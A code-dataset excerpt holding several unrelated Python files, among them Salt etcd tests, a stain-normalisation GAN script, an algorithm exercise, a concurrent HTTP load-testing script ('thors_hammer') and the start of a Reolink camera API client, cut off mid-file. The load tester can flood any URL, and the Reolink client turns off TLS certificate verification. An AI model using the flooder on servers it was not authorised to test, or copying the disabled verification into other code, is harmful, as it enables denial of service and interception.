\"dockerd\", check_all=False),\n]\n\n\n@pytest.fixture\ndef configure_loader_modules(minion_opts):\n return {\n etcd_return: {\n \"__opts__\": minion_opts,\n },\n }\n\n\n@pytest.fixture(scope=\"module\")\ndef update_etcd_profile(profile_name, prefix, etcd_profile):\n etcd_profile.update(\n {\n \"etcd.returner\": profile_name,\n \"etcd.returner_root\": prefix,\n }\n )\n\n return etcd_profile\n\n\n@pytest.fixture(scope=\"module\")\ndef minion_config_overrides(update_etcd_profile):\n return update_etcd_profile\n\n\n@pytest.fixture(scope=\"module\")\ndef etcd_client(minion_opts, profile_name):\n return get_conn(minion_opts, profile=profile_name)\n\n\n@pytest.fixture(scope=\"module\")\ndef prefix():\n return \"/salt/pillar/test\"\n\n\n@pytest.fixture(autouse=True)\ndef cleanup_prefixed_entries(etcd_client, prefix):\n \"\"\"\n Cleanup after each test to ensure a consistent starting state.\n \"\"\"\n try:\n assert etcd_client.get(prefix, recurse=True) is None\n yield\n finally:\n etcd_client.delete(prefix, recurse=True)\n\n\ndef test_returner(prefix, etcd_client):\n \"\"\"\n Test returning values to etcd\n \"\"\"\n ret = {\n \"id\": \"test-id\",\n \"jid\": \"123456789\",\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n }\n etcd_return.returner(ret)\n assert etcd_client.get(\"/\".join((prefix, \"minions\", ret[\"id\"]))) == ret[\"jid\"]\n expected = {key: salt.utils.json.dumps(ret[key]) for key in ret}\n assert (\n etcd_client.get(\"/\".join((prefix, \"jobs\", ret[\"jid\"], ret[\"id\"])), recurse=True)\n == expected\n )\n\n\ndef test_save_and_get_load():\n \"\"\"\n Test saving a data load to etcd\n \"\"\"\n jid = \"123456789\"\n load = {\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n }\n etcd_return.save_load(jid, load)\n assert etcd_return.get_load(jid) == load\n\n\ndef test_get_jid():\n \"\"\"\n Test getting the return for a given jid\n \"\"\"\n jid = \"123456789\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": jid,\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n \"return\": \"test-return-1\",\n }\n etcd_return.returner(ret)\n\n ret = {\"id\": \"test-id-2\", \"jid\": jid, \"return\": \"test-return-2\"}\n etcd_return.returner(ret)\n\n expected = {\n \"test-id-1\": {\"return\": \"test-return-1\"},\n \"test-id-2\": {\"return\": \"test-return-2\"},\n }\n assert etcd_return.get_jid(jid) == expected\n\n\ndef test_get_fun():\n \"\"\"\n Test getting the latest fn run for each minion and matching to a target fn\n \"\"\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": \"1\",\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n \"return\": \"test-return-1\",\n \"fun\": \"test.ping\",\n }\n etcd_return.returner(ret)\n\n ret = {\n \"id\": \"test-id-2\",\n \"jid\": \"2\",\n \"return\": \"test-return-2\",\n \"fun\": \"test.collatz\",\n }\n etcd_return.returner(ret)\n\n expected = {\n \"test-id-2\": \"test.collatz\",\n }\n assert etcd_return.get_fun(\"test.collatz\") == expected\n\n\ndef test_get_jids():\n \"\"\"\n Test getting all jids\n \"\"\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": \"1\",\n }\n etcd_return.returner(ret)\n\n ret = {\n \"id\": \"test-id-2\",\n \"jid\": \"2\",\n }\n etcd_return.returner(ret)\n\n retval = etcd_return.get_jids()\n assert len(retval) == 2\n assert \"1\" in retval\n assert \"2\" in retval\n\n\ndef test_get_minions():\n \"\"\"\n Test getting a list of minions\n \"\"\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": \"1\",\n }\n etcd_return.returner(ret)\n\n ret = {\n \"id\": \"test-id-2\",\n \"jid\": \"2\",\n }\n etcd_return.returner(ret)\n\n retval = etcd_return.get_minions()\n assert len(retval) == 2\n assert \"test-id-1\" in retval\n assert \"test-id-2\" in retval\n","repo_name":"saltstack/salt","sub_path":"tests/pytests/functional/returners/test_etcd_return.py","file_name":"test_etcd_return.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"12122540851","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#\n# Author : Viacheslav Zamaraev\n# email : zamaraev@gmail.com\n# Script Name : 01_csv_to_pg.py\n# Created : 03 August 2020\n# Last Modified\t: 03 August 2020\n# Version\t\t : 1.0\n# PIP : pip install tqdm peewee psycopg2 psycopg2-binary\n# RESULT : csv file with columns: FILENAME;...LASTACCESS\n# Modifications\t: 1.1 -\n# : 1.2 -\n#\n# Description : get lines in each csv fle in folder and put to PG\n# In PSQL:\n# create database udatadb2;\n# create user udatauser2 with encrypted password 'secret_password';\n# grant all privileges on database udatadb2 to udatauser2;\n\nimport os # Load the Library Module\nimport os.path\nfrom datetime import datetime\nimport csv\nimport logging\nfrom itertools import (takewhile, repeat)\n\ntry:\n from tqdm import tqdm\nexcept Exception as e:\n print(\"Exception occurred \" + str(e))\n print(\"try: pip install tqdm\")\n\n# non standard packages\ntry:\n from peewee import *\nexcept Exception as e:\n print(\"Exception occurred \" + str(e))\n print(\"try: pip install peewee\")\n\n\n#from . import cfg # some global configurations\n#from . import gfiletools # some global configurations\nimport cfg\nimport gfiletools\nimport models\n\n#from src.models import Udata\n\n\n\n\n\ndef get_extension(filename=''):\n basename = os.path.basename(filename) # os independent\n ffile = filename.split('\\\\').pop().split('/').pop()\n ext = '.'.join(ffile.split('.')[1:])\n\n if len(ext):\n return '.' + ext if ext else None\n else:\n return ''\n\n\ndef get_file_name_with_extension(path=''):\n # ext = get_extension(path)\n return os.path.split(path)[1]\n # if len(ext):\n # return path.split('\\\\').pop().split('/')[0]\n # else:\n # return path.split('\\\\').pop().split('/').pop()\n\n # return path.split('\\\\').pop().split('/')[0] # path.split('\\\\').pop().split('/').pop().rsplit('.', 1)[0]\n\n\ndef get_file_name_without_extension(path=''):\n ext = get_extension(path)\n if len(ext):\n return path.split('\\\\').pop().split('/').pop().rsplit(ext, 1)[0]\n else:\n return path.split('\\\\').pop().split('/').pop()\n # return path.split('\\\\').pop().split('/').pop().rsplit(get_extension(path), 1)[0]\n\n\ndef file_rows_count(filename):\n rowcount = 0\n try:\n f = open(filename, 'rb')\n bufgen = takewhile(lambda x: x, (f.raw.read(1024 * 1024) for _ in repeat(None)))\n rowcount = sum(buf.count(b'\\n') for buf in bufgen)\n return rowcount\n except Exception as e:\n ss = \"Exception occurred file_rows_count\" + str(e)\n print(ss)\n logging.error(ss)\n return rowcount\n\n\ndef csv_file_out_create():\n csv_dict = cfg.csv_dict\n file_csv = str(os.path.join(gfiletools.get_output_directory(), cfg.file_csv)) # from cfg.file\n # Если выходной CSV файл существует - удаляем его\n if os.path.isfile(file_csv):\n os.remove(file_csv)\n with open(file_csv, 'w', newline='', encoding='utf-8') as csv_file: # Just use 'w' mode in 3.x\n csv_file_open = csv.DictWriter(csv_file, csv_dict.keys(), delimiter=cfg.csv_delimiter)\n csv_file_open.writeheader()\n\n\ndef get_list_csv_dir(dir_input=''):\n listdir = []\n try:\n for root, subdirs, files in os.walk(dir_input):\n for file in os.listdir(root):\n file_path = str(os.path.join(root, file))\n # .lower() - под линуксом есть разница!!!\n ext = '.'.join(file.split('.')[1:]).lower()\n file_name = file.lower()\n if os.path.isfile(file_path) and file_name.endswith('.csv'): # ext == \"csv\":\n # print(file_path)\n listdir.append(file_path)\n except Exception as e:\n ss = \"Exception occurred get_list_csv_dir\" + str(e)\n print(ss)\n logging.error(ss)\n return listdir\n\n\n'''\n PG Create tables\n'''\ndef pg_create_tables():\n pass\n # # db = SqliteDatabase('zsniigg.db')\n # db = peewee.PostgresqlDatabase(cfg.database, host=cfg.host, port='5432', user=cfg.user, password=cfg.user_password,\n # autocommit=True, autorollback=True) # )\n # # db = PostgresqlDatabase(cfg.database, user=cfg.user, password=cfg.user_password) # host=cfg.host )\n # # db.autorollback = True\n # db.connect()\n # try:\n # db.create_tables([models.Udata], safe=True)\n # except peewee.InternalError as px:\n # print(str(px))\n\n # db.drop_tables([Udata])\n\n\n\n'''\n Do many csv files and make one csv file big\n'''\ndef csv_file_to_pg(filename_with_path=''):\n csv_dict = cfg.csv_dict\n dir_out = gfiletools.get_output_directory()\n file_csv = str(os.path.join(dir_out, cfg.file_csv))\n # db = PostgresqlDatabase(cfg.database, host=cfg.host, port=None, user=cfg.user, password=cfg.user_password,\n # autocommit=True, autorollback=True) # )\n # db.connect()\n\n\n\n\n\n\n\ndef do_multithreading(dir_input=''):\n list_csv = get_list_csv_dir(dir_input)\n dir_out = gfiletools.get_output_directory()\n # for f in list_csv:\n # csv_file_to_pg(f)\n csv_file_to_pg(list_csv[1])\n # csv_file_to_pg(list_csv[2])\n # csv_file_to_pg(list_csv[5])\n # csv_file_to_pg(list_csv[6])\n # csv_file_to_pg(list_csv[27])\n # csv_file_to_pg(list_csv[28])\n\n\n\n# ---------------- do main --------------------------------\ndef main():\n time1 = datetime.now()\n print('Starting at :' + str(time1))\n\n dir_input = gfiletools.get_input_directory()\n csv_file_out_create()\n gfiletools.do_log_file()\n pg_create_tables()\n\n do_multithreading(dir_input)\n\n time2 = datetime.now()\n print('Finishing at :' + str(time2))\n print('Total time : ' + str(time2 - time1))\n print('DONE !!!!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gloryvictory/Udata2","sub_path":"src/01_csv_to_pg.py","file_name":"01_csv_to_pg.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17049512564","text":"from contextlib import contextmanager\n\nfrom cookiecutter.utils import rmtree\n\n\n@contextmanager\ndef bake_in_temp_dir(cookies, *args, **kwargs):\n\n result = cookies.bake(*args, **kwargs)\n\n try:\n yield result\n finally:\n rmtree(str(result.project))\n\n\ndef test_bake_with_defaults(cookies):\n\n with bake_in_temp_dir(cookies) as result:\n\n assert result.project.isdir()\n assert result.exit_code == 0\n assert result.exception is None\n","repo_name":"benjcunningham/cookiecutter-profile-dashboard","sub_path":"tests/test_bake_project.py","file_name":"test_bake_project.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40678313791","text":"#!/usr/bin/python3.4\n#written by pseudophed (The Great)\n# o7 bitches #\n\nimport urllib.request, datetime, argparse, queue, threading, multiprocessing\n\nparser = argparse.ArgumentParser(prog='thors_hammer', description='Load test web sites or web applications')\nparser.add_argument('-u', action='store', dest='url', required=True)\nparser.add_argument('-n', action='store', type=int, dest='total_requests', help='Total requests to make to the server. Default is 10')\nparser.add_argument('-c', action='store', type=int, dest='conc_conn', help='Total number of concurrent connections to make')\nparser.add_argument('-v', action='version', version='%(prog)s 1.0')\ncommandArgs = parser.parse_args()\n\nrequests = multiprocessing.Queue()\nq = multiprocessing.JoinableQueue()\ntotal_reqs = -5\n\n\ndef load_test():\n \n while not q.empty():\n if q.qsize() % 1000 == 0:\n print('{} requests left to perform...'.format(q.qsize()))\n testUrl = q.get()\n# print(testUrl)\n try:\n response = urllib.request.urlopen(testUrl)\n response.readall()\n requests.put('whoop')\n #print(requests)\n except Exception as err:\n# print(err)\n pass\n \n #print(requests.qsize())\n q.task_done()\n \ndef load_queue(queueSize, testUrl):\n\n for x in range(queueSize):\n q.put(testUrl)\n #q.close()\n #print(q.qsize())\n\ndef run():\n \n if commandArgs.total_requests:\n total_requests = commandArgs.total_requests\n else:\n total_requests = 10 \n \n print('Load testing {}:'.format(commandArgs.url)) \n load_queue(total_requests, commandArgs.url)\n \n# print('q.qsize: {}'.format(q.qsize()))\n \n if commandArgs.conc_conn:\n concurrent = commandArgs.conc_conn\n else:\n concurrent = 1\n\n for a in range(concurrent):\n p = multiprocessing.Process(target=load_test)\n# p.daemon = True\n p.start()\n \n p.join()\n\n# print('run loop: {}'.format(requests.qsize()))\n\ndef main():\n \n startTime = datetime.datetime.now()\n \n run() \n\n# print('main loop: {}'.format(requests.qsize()))\n \n print('Processed {} successful requests out of {} requests performed ({}% success rate) in {} seconds.'.format(requests.qsize(), commandArgs.total_requests,str((requests.qsize()/commandArgs.total_requests) * 100),str((datetime.datetime.now() - startTime).total_seconds())))\n\n\n\nif __name__ == '__main__' :\n main()","repo_name":"pseudophed/thors_hammer","sub_path":"thors_hammer.py","file_name":"thors_hammer.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44728902473","text":"from sofia.resolvers import AttributeResolver\n\n\nclass SyncResolver(AttributeResolver):\n\n ATTRIBUTE = 'sync'\n\n def resolve_out(self, ins):\n \"\"\"\n Determine which stream the output is synchronised with. If the incoming streams have different sync values, then\n it is unknown what synchronisation the outgoing stream should have. \n :param ins: dictionary of the incoming streams' sync values\n :return: \n \"\"\"\n values = set()\n for value in ins.values():\n values.update(value)\n if len(values) > 1:\n msg = 'Unable to resolve sync stream. Consider adding a custom resolver to {}.'\n raise ValueError(msg.format(self.step.name))\n return {key: values for key in self.step.outs}\n","repo_name":"childsish/sofia","sub_path":"templates/genomics/attributes/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"10737997850","text":"def longest_common_substr_non_contiguous(S1, S2, n, m):\n \"\"\"\n Find largest common sub-string non-contiguous. E.g. for inputs\n S1 = \"ABCDGH\", S2 = \"ACDGHR\", output should be 5 (ACDGH)\n \"\"\"\n # go progressively through each character of S1, and of S2. At each\n len_of_longest_subsequence = [([0] * (n + 1)) for i in range(m + 1)]\n\n for i_1 in range(n + 1): # index i_1 of S1\n for i_2 in range(m + 1): # index i_2 of S2\n # consider the longest_subsequence (i_1, i_2) between S1[:k_1] and S2[:k_2]\n if (i_1 - 1 < 0) or (i_1 - 1 < 0): # no character: have no started going through strings\n pass # the length of the longest subsequence is 0 since there is no character\n elif S1[i_1 - 1] == S2[i_2 - 1]:\n # there is a match: can add new element to previous longest common subsequence to make\n # a longer subsequence\n len_of_longest_subsequence[i_2][i_1] = len_of_longest_subsequence[i_2 - 1][i_1 - 1] + 1\n else:\n # there is no matcH; the new longest subsequence with i_1, i2 elements is either the previous one\n # with i_1 - 1, i_2, or i_1, i_2 - 1\n len_of_longest_subsequence[i_2][i_1] = max(\n len_of_longest_subsequence[i_2][i_1 - 1],\n len_of_longest_subsequence[i_2 - 1][i_1]\n )\n # the overall longest subsequence is the one using all the elements at our disposal\n return len_of_longest_subsequence[-1][-1]\n\n\n\ndef largest_common_substr_contiguous(S1, S2, n, m):\n \"\"\"\n Tabulated implementation\n \"\"\"\n # go progressively through each character of S1, and of S2. At each step, record the length of the longest possible\n # substring that finishes at this item (if any)\n # Create a table to store lengths of\n # longest common suffixes of substrings.\n # Note that LCSuff[i][j] contains the\n # length of longest common suffix of\n # X[0...i-1] and Y[0...j-1]. The first\n # row and first column entries have no\n # logical meaning, they are used only\n # for simplicity of the program.\n ans = 0\n len_of_longest_subsequence = [([0] * (n + 1)) for i in range(m + 1)]\n for i_2 in range(m + 1): # index i_1 of S1\n for i_1 in range(n + 1): # index i_2 of S2\n # consider the longest_subsequence (i_1, i_2) between S1[:k_1] and S2[:k_2]\n if (i_1 == 0) or (i_2 == 0): # no character: have no started going through strings\n pass # the length of the longest subsequence is 0 since there is no character\n elif S1[i_1 - 1] == S2[i_2 - 1]:\n # there is a match: can add new element to previous longest common subsequence to make\n # a longer subsequence\n len_of_longest_subsequence[i_2][i_1] = len_of_longest_subsequence[i_2 - 1][i_1 - 1] + 1\n ans = max(ans, len_of_longest_subsequence[i_2][i_1])\n # the overall longest subsequence is the one using all the elements at our disposal\n return ans\n\n\ndef lcs_contiguous_memoized(X, Y, m, n, dp):\n \"\"\" Source: https://www.geeksforgeeks.org/longest-common-subsequence-dp-4/ \"\"\"\n if (m == 0 or n == 0):\n return 0\n\n if (dp[m][n] != -1):\n return dp[m][n] # we already computed the longest substring finishing at X[m] using X[:m] and Y[:n]\n\n if X[m - 1] == Y[n - 1]:\n # there is a match, so longest substring finishing at X[m] using X[:m] and Y[:n] must be 1 + the longest\n # substring finishing at X[m] using X[:m - 1] and Y[:n- 1]\n dp[m][n] = 1 + lcs_contiguous_memoized(X, Y, m - 1, n - 1, dp)\n return dp[m][n]\n\n dp[m][n] = max(lcs_contiguous_memoized(X, Y, m, n - 1, dp), lcs_contiguous_memoized(X, Y, m - 1, n, dp))\n return dp[m][n]\n\n\nif __name__ == '__main__':\n S1 = \"AGGTAB\"\n S2 = \"GXTXAYB\"\n m = len(S1)\n n = len(S2)\n res_non_contiguous = longest_common_substr_non_contiguous(S1=S1, S2=S2, n=len(S1), m=len(S2))\n res = largest_common_substr_contiguous(S1=S1, S2=S2, n=m, m=n)\n g4g_res = lcs_contiguous_memoized(X=S1, Y=S2, m=m, n=n,\n dp=[[-1 for i in range(n + 1)]for j in range(m + 1)])\n print(0)","repo_name":"GabCaz/quant-algorithms","sub_path":"dynamic-programming/longest_common_substring.py","file_name":"longest_common_substring.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20292641060","text":"# +\nimport os\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torchvision\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nimport utils\nfrom arch import define_Gen, define_Dis\nimport kornia\nimport pandas as pd\nimport warnings\n\nimport torch.nn.functional as F\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport argparse\nfrom PIL import Image\nimport random\n# -\n\nwarnings.filterwarnings('ignore')\n\n\nclass Arguments(object):\n def __init__(self, dictionary):\n \"\"\"Constructor\"\"\"\n for key in dictionary:\n setattr(self, key, dictionary[key])\n\n\n# +\n\nargs = {\n 'epochs': 10,\n 'decay_epoch': 9,\n 'batch_size': 1,\n 'lr': 0.0002,\n 'load_height': 128,\n 'load_width': 128,\n 'gpu_ids': '0',\n 'crop_height': 128,\n 'crop_width': 128,\n 'alpha': 10, # Cyc loss\n 'beta': 5, # Scyc loss\n 'gamma': 5, # Dssim loss \n 'delta': 0.5, # Identity\n 'training': True,\n 'testing': True,\n 'results_dir': '/project/DSone/as3ek/data/ganstain/CCHMC_vsi_svs/results/',\n 'dataset_dir': '/project/DSone/as3ek/data/ganstain/CCHMC_vsi_svs/',\n 'checkpoint_dir': '/project/DSone/as3ek/data/ganstain/CCHMC_vsi_svs/checkpoint/',\n 'norm': 'batch',\n 'use_dropout': False,\n 'ngf': 64,\n 'ndf': 64,\n 'gen_net': 'unet_128',\n 'dis_net': 'n_layers',\n 'self_attn': True,\n 'spectral': True,\n 'log_freq': 50,\n 'custom_tag': '',\n 'gen_samples': False,\n 'specific_samples': False\n}\n\n\nargs = Arguments(args)\n\n\n# SOURCE AND TARGET FOLDERS\nsource_path = '/project/DSone/as3ek/data/patches/1000/classification/cinn_celiac__normal/valid/celiac/'\ntarget_path = '/project/DSone/as3ek/data/patches/1000/gan_normalized/cinn_celiac__normal/valid/celiac/'\ntrain_valid_split = 1\nsize = 256\none_direction = False # If this is false. b -> a -> b will happen. Edit code for otherwise.\ngen_name = 'Gba' # Gba to generate b given a, i.e., a -> b\nfolder_to_folder = True\n\nif not os.path.exists(target_path):\n os.makedirs(target_path)\n\ntag1 = 'noattn'\nif args.self_attn:\n tag1 = 'attn'\n\ntag2 = 'nospec'\nif args.spectral:\n tag2 = 'spectral'\n\n# Generate paths for checkpoint and results\nargs.identifier = str(args.gen_net) + '_' + str(args.dis_net) + '_' \\\n+ str(args.lr) + '_' + args.norm + '_' + tag1 + '_' + tag2 + '_' + str(args.batch_size) + '_' \\\n+ str(args.load_height) + '_coefs_' + str(args.alpha) + '_' + str(args.beta) + '_' + str(args.gamma) + '_'\\\n+ str(args.delta) + '_' + args.custom_tag\n\nargs.checkpoint_path = args.checkpoint_dir + args.identifier\nargs.results_path = args.results_dir + args.identifier\n\nargs.gpu_ids = []\nfor i in range(torch.cuda.device_count()):\n args.gpu_ids.append(i)\n \ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# -\n\nif one_direction:\n G = define_Gen(input_nc=3, output_nc=3, ngf=args.ngf, netG=args.gen_net, norm=args.norm, \n use_dropout= args.use_dropout, gpu_ids=args.gpu_ids, self_attn=args.self_attn, spectral = args.spectral)\nelse:\n Gab = define_Gen(input_nc=3, output_nc=3, ngf=args.ngf, netG=args.gen_net, norm=args.norm, \n use_dropout= args.use_dropout, gpu_ids=args.gpu_ids, self_attn=args.self_attn, spectral = args.spectral)\n Gba = define_Gen(input_nc=3, output_nc=3, ngf=args.ngf, netG=args.gen_net, norm=args.norm, \n use_dropout= args.use_dropout, gpu_ids=args.gpu_ids, self_attn=args.self_attn, spectral = args.spectral)\n\nckpt = utils.load_checkpoint('%s/latest.ckpt' % (args.checkpoint_path))\nif one_direction:\n G.load_state_dict(ckpt[gen_name])\n G.eval()\nelse:\n Gab.load_state_dict(ckpt['Gab'])\n Gba.load_state_dict(ckpt['Gba'])\n Gab.eval()\n Gba.eval()\nprint('Eval mode')\n\n# +\nbiopsy_patch_no_map = {}\nbiopsy_target_map = {}\n\ntransform = transforms.Compose([\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])\n])\n\nfor i, patch_name in enumerate(os.listdir(source_path)):\n if not folder_to_folder:\n # Check if patch should be sent to valid for every patch from new patient\n if patch_name.split('__')[0] not in biopsy_patch_no_map: \n biopsy_patch_no_map[patch_name.split('__')[0]] = 0\n if random.randint(1, 10) > train_valid_split*10:\n biopsy_target_map[patch_name.split('__')[0]] = 'train'\n else:\n biopsy_target_map[patch_name.split('__')[0]] = 'valid'\n # Keeping track of number of patches per biopsy crop \n biopsy_patch_no_map[patch_name.split('__')[0]] += 1\n \n img = Image.open(source_path + patch_name)\n img = img.convert('RGB')\n img = img.resize((size, size))\n img = np.array(img)\n img = img.transpose(2, 0, 1)\n img = img / 255.\n img = torch.FloatTensor(img).to(device)\n image = transform(img)\n image = image.unsqueeze(0)\n if one_direction or patch_name.startswith('C'):\n out = Gba(image)\n else:\n out = Gab(image)\n out = Gba(out)\n if not folder_to_folder:\n biopsy_target_path = target_path.replace('train', biopsy_target_map[patch_name.split('__')[0]])\n torchvision.utils.save_image((out + 1)/2, biopsy_target_path + patch_name)\n else:\n biopsy_target_path = target_path\n torchvision.utils.save_image((out + 1)/2, biopsy_target_path + patch_name)\n if i % 1000 == 0:\n print(i)\n# -\n\nos.listdir(source_path)[0].split('__')\n\n\n","repo_name":"4m4n5/saasn-stain-normalization","sub_path":"normalize_patches.py","file_name":"normalize_patches.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"23352354660","text":"\"\"\" Reolink NVR/camera network API \"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nimport base64\nimport hashlib\nimport logging\nimport ssl\nimport traceback\nimport uuid\nfrom datetime import datetime, timedelta, tzinfo\nfrom os.path import basename\nfrom typing import Any, Literal, Optional, overload\nfrom urllib import parse\nfrom xml.etree import ElementTree as XML\nfrom statistics import mean\n\nfrom orjson import JSONDecodeError, loads as json_loads # pylint: disable=no-name-in-module\nimport aiohttp\n\nfrom . import templates, typings\nfrom .enums import DayNightEnum, StatusLedEnum, SpotlightModeEnum, PtzEnum, GuardEnum, TrackMethodEnum, SubType\nfrom .exceptions import (\n ApiError,\n CredentialsInvalidError,\n InvalidContentTypeError,\n InvalidParameterError,\n LoginError,\n NoDataError,\n NotSupportedError,\n ReolinkError,\n SubscriptionError,\n UnexpectedDataError,\n ReolinkConnectionError,\n ReolinkTimeoutError,\n)\nfrom .software_version import SoftwareVersion, NewSoftwareVersion, MINIMUM_FIRMWARE\nfrom .utils import datetime_to_reolink_time, reolink_time_to_datetime\n\nMANUFACTURER = \"Reolink\"\nDEFAULT_STREAM = \"sub\"\nDEFAULT_PROTOCOL = \"rtmp\"\nDEFAULT_TIMEOUT = 30\nRETRY_ATTEMPTS = 3\nMAX_CHUNK_ITEMS = 40\nDEFAULT_RTMP_AUTH_METHOD = \"PASSWORD\"\nSUBSCRIPTION_TERMINATION_TIME = 15 # minutes\nLONG_POLL_TIMEOUT = 5 # minutes\n\nMOTION_DETECTION_TYPE = \"motion\"\nFACE_DETECTION_TYPE = \"face\"\nPERSON_DETECTION_TYPE = \"person\"\nVEHICLE_DETECTION_TYPE = \"vehicle\"\nPET_DETECTION_TYPE = \"pet\"\nVISITOR_DETECTION_TYPE = \"visitor\"\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER_DATA = logging.getLogger(__name__ + \".data\")\n\nSSL_CONTEXT = ssl.create_default_context()\nSSL_CONTEXT.set_ciphers(\"DEFAULT\")\nSSL_CONTEXT.check_hostname = False\nSSL_CONTEXT.verify_mode = ssl.CERT_NONE\n\n# with 2 streaming channels\nDUAL_LENS_DUAL_MOTION_MODELS: set[str] = {\n \"Reolink Duo PoE\",\n \"Reolink Duo WiFi\",\n}\nDUAL_LENS_SINGLE_MOTION_MODELS: set[str] = {\n \"Reolink TrackMix PoE\",\n \"Reolink TrackMix WiFi\",\n \"RLC-81MA\",\n}\nDUAL_LENS_MODELS: set[str] = DUAL_LENS_DUAL_MOTION_MODELS | DUAL_LENS_SINGLE_MOTION_MODELS\n\n\n##########################################################################################################################################################\n# API class\n##########################################################################################################################################################\nclass Host:\n \"\"\"Reolink network API class.\"\"\"\n\n def __init__(\n self,\n host: str,\n username: str,\n password: str,\n port: Optional[int] = None,\n use_https: Optional[bool] = None,\n protocol: str = DEFAULT_PROTOCOL,\n stream: str = DEFAULT_STREAM,\n timeout: int = DEFAULT_TIMEOUT,\n rtmp_auth_method: str = DEFAULT_RTMP_AUTH_METHOD,\n aiohttp_get_session_callback=None,\n ):\n self._send_mutex = asyncio.Lock()\n self._login_mutex = asyncio.Lock()\n self._long_poll_mutex = asyncio.Lock()\n\n ##############################################################################\n # Host\n self._url: str = \"\"\n self._use_https: Optional[bool] = use_https\n self._host: str = host\n self._port: Optional[int] = port\n self._rtsp_port: Optional[int] = None\n self._rtmp_port: Optional[int] = None\n self._onvif_port: Optional[int] = None\n self._rtsp_enabled: Optional[bool] = None\n self._rtmp_enabled: Optional[bool] = None\n self._onvif_enabled: Optional[bool] = None\n self._mac_address: Optional[str] = None\n\n self.refresh_base_url()\n\n ##############################################################################\n # Login session\n self._username: str = username\n self._password: str = password[:31]\n self._token: Optional[str] = None\n self._lease_time: Optional[datetime] = None\n # Connection session\n self._timeout: aiohttp.ClientTimeout = aiohttp.ClientTimeout(total=timeout)\n if aiohttp_get_session_callback is not None:\n self._get_aiohttp_session = aiohttp_get_session_callback\n else:\n self._get_aiohttp_session = lambda: aiohttp.ClientSession(timeout=self._timeout, connector=aiohttp.TCPConnector(ssl=SSL_CONTEXT))\n self._aiohttp_session: aiohttp.ClientSession = self._get_aiohttp_session()\n\n ##############################################################################\n # NVR (host-level) attributes\n self._is_nvr: bool = False\n self._nvr_name: str = \"\"\n self._nvr_serial: Optional[str] = None\n self._nvr_model: Optional[str] = None\n self._nvr_num_channels: int = 0\n self._nvr_hw_version: Optional[str] = None\n self._nvr_sw_version: Optional[str] = None\n self._nvr_sw_version_object: Optional[SoftwareVersion] = None\n self._nvr_sw_hardware_id: Optional[int] = None\n self._nvr_sw_model_id: Optional[int] = None\n\n ##############################################################################\n # Channels of cameras, used in this NVR ([0] for a directly connected camera)\n self._GetChannelStatus_present: bool = False\n self._GetChannelStatus_has_name: bool = False\n self._channels: list[int] = []\n self._stream_channels: list[int] = []\n self._channel_names: dict[int, str] = {}\n self._channel_models: dict[int, str] = {}\n self._is_doorbell: dict[int, bool] = {}\n\n ##############################################################################\n # API-versions and capabilities\n self._api_version: dict[str, int] = {}\n self._abilities: dict[str, Any] = {} # raw response from NVR/camera\n self._capabilities: dict[int | str, list[str]] = {\"Host\": []} # processed by construct_capabilities\n\n ##############################################################################\n # Video-stream formats\n self._stream: str = stream\n self._protocol: str = protocol\n self._rtmp_auth_method: str = rtmp_auth_method\n self._rtsp_mainStream: dict[int, str] = {}\n self._rtsp_subStream: dict[int, str] = {}\n\n ##############################################################################\n # Presets\n self._ptz_presets: dict[int, dict] = {}\n\n ##############################################################################\n # Saved info response-blocks\n self._hdd_info: Optional[dict] = None\n self._local_link: Optional[dict] = None\n self._wifi_signal: Optional[int] = None\n self._users: Optional[dict] = None\n\n ##############################################################################\n # Saved settings response-blocks\n # Host-level\n self._time_settings: Optional[dict] = None\n self._host_time_difference: float = 0\n self._ntp_settings: Optional[dict] = None\n self._netport_settings: Optional[dict] = None\n # Camera-level\n self._zoom_focus_settings: dict[int, dict] = {}\n self._zoom_focus_range: dict[int, dict] = {}\n self._auto_focus_settings: dict[int, dict] = {}\n self._isp_settings: dict[int, dict] = {}\n self._ftp_settings: dict[int, dict] = {}\n self._osd_settings: dict[int, dict] = {}\n self._push_settings: dict[int, dict] = {}\n self._enc_settings: dict[int, dict] = {}\n self._ptz_presets_settings: dict[int, dict] = {}\n self._ptz_guard_settings: dict[int, 